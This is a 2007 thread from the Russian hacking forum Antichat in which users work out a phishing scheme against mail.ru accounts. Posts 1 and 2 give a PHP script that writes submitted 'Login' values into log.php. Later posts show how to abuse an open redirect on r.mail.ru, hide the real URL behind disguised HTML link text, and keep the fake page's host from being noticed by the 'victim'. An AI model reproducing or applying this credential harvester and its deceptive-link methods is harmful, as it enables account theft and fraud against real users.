ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > E-Mail
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.03.2007, 15:12
xe0n2
Новичок
Регистрация: 06.01.2006
Сообщений: 8
Провел на форуме:
28997

Репутация: 1
По умолчанию

Подскажите, пожалуйста: Если имя текстового поля, которое надо записать Login, то куда его нужно подставлять в этом скрипте? и будет ли этого скрипта достаточно чтобы данные записались в log.php

<?php
$username=$_GET['username'];
if (isset($username))
{
$log_path="./log.php";
$log_string=$username." ";
$file=fopen($log_path,"a");
fwrite($file, $log_string, strlen($log_string));
fclose($file);
}
?>
 

  #2  
Старый 29.03.2007, 15:59
FindeR
Участник форума
Регистрация: 15.11.2006
Сообщений: 259
Провел на форуме:
2589211

Репутация: 151
По умолчанию

xe0n2
PHP код:
<?php
$Login
=$_GET['Login'];
if (isset(
$Login))
{
$log_path="./log.php";
$log_string=$Login." ";
$file=fopen($log_path,"a");
fwrite($file$log_stringstrlen($log_string));
fclose($file);
}
?>
 

  #3  
Старый 30.03.2007, 00:07
xe0n2
Новичок
Регистрация: 06.01.2006
Сообщений: 8
Провел на форуме:
28997

Репутация: 1
По умолчанию

со ссылкой разобрался, но закодированная ссылка вида http://r.mail.ru/cln2863/%77%77%77%2E%79%61%2E%72%75%2F почему то не работает. (пишет сервер не найден)
 

  #4  
Старый 30.03.2007, 00:22
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию

Цитата:
Сообщение от xe0n2  
со ссылкой разобрался, но закодированная ссылка вида http://r.mail.ru/cln2863/%77%77%77%2E%79%61%2E%72%75%2F почему то не работает. (пишет сервер не найден)
Потому что кодировка пишется после адреса на каторый перекидывает,
Пиши так http://r.mail.ru/cln2863/www.ya.ru
и отсылай письмо с помощью хтмл, а там я надеюсь ты знаеш как визуально адрес изменить
Код:
<a herf=http://r.mail.ru/cln2863/www.ya.ru>http://r.mail.ru/cln2863/%77%77%77%2E%79%61%2E%72%75%2F </a>
и будет счатя, я так обошел
 

  #5  
Старый 31.03.2007, 17:16
v0rm
Новичок
Регистрация: 31.03.2007
Сообщений: 4
Провел на форуме:
39956

Репутация: 2
По умолчанию

Кодированные линки не будут работать в Internet Explorer 7.0 , на сайте microsoft-а читал, такую мазу они ввели видимо из соображений безопасности...
так что ребята, облом с URL-кодировой...
 

  #6  
Старый 31.03.2007, 18:11
ground_zero
Постоянный
Регистрация: 11.10.2006
Сообщений: 659
Провел на форуме:
1594033

Репутация: 216


По умолчанию

http://ha.ckers.org/xss.html
 

  #7  
Старый 31.03.2007, 22:13
sacron
Познающий
Регистрация: 16.06.2006
Сообщений: 89
Провел на форуме:
119475

Репутация: 2
По умолчанию

B** почитал здесь весь ваш базар,но так и не понял главного или пропустил читая,кто-нибудь хоть знает как зашифровать сам линк,появляющийся в строке адреса,когда страница по ссылке уже открыта,а то я уже заё*** светить свой хост при переходе на подставную страницу

Последний раз редактировалось Koller; 04.04.2007 в 09:58..
 

  #8  
Старый 03.04.2007, 21:57
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию

Цитата:
Сообщение от sacron  
B** почитал здесь весь ваш базар,но так и не понял главного или пропустил читая,кто-нибудь хоть знает как зашифровать сам линк,появляющийся в строке адреса,когда страница по ссылке уже открыта,а то я уже заё*** светить свой хост при переходе на подставную страницу
А вот там уже нельзя, потому и рег левый бесплатный хост

Последний раз редактировалось Koller; 04.04.2007 в 09:59..
 

  #9  
Старый 16.04.2007, 10:33
xAntifa_GuYx
Познающий
Регистрация: 10.03.2007
Сообщений: 89
Провел на форуме:
390717

Репутация: 41
По умолчанию

Цитата:
Сообщение от sacron  
B** почитал здесь весь ваш базар,но так и не понял главного или пропустил читая,кто-нибудь хоть знает как зашифровать сам линк,появляющийся в строке адреса,когда страница по ссылке уже открыта,а то я уже заё*** светить свой хост при переходе на подставную страницу
А почему бы не сделать чтоб страница открывалась во весь экран, без строки?? Как на порно сайтах делают
 

  #10  
Старый 16.04.2007, 21:31
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию

Цитата:
Сообщение от xAntifa_GuYx  
А почему бы не сделать чтоб страница открывалась во весь экран, без строки?? Как на порно сайтах делают
Ни у всех ie :\ а уже что то даже на движке ие отоброжает адрестную строку! и вообще помните что малейшие различии от оригинала могут повергуть в сомнения жертву
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ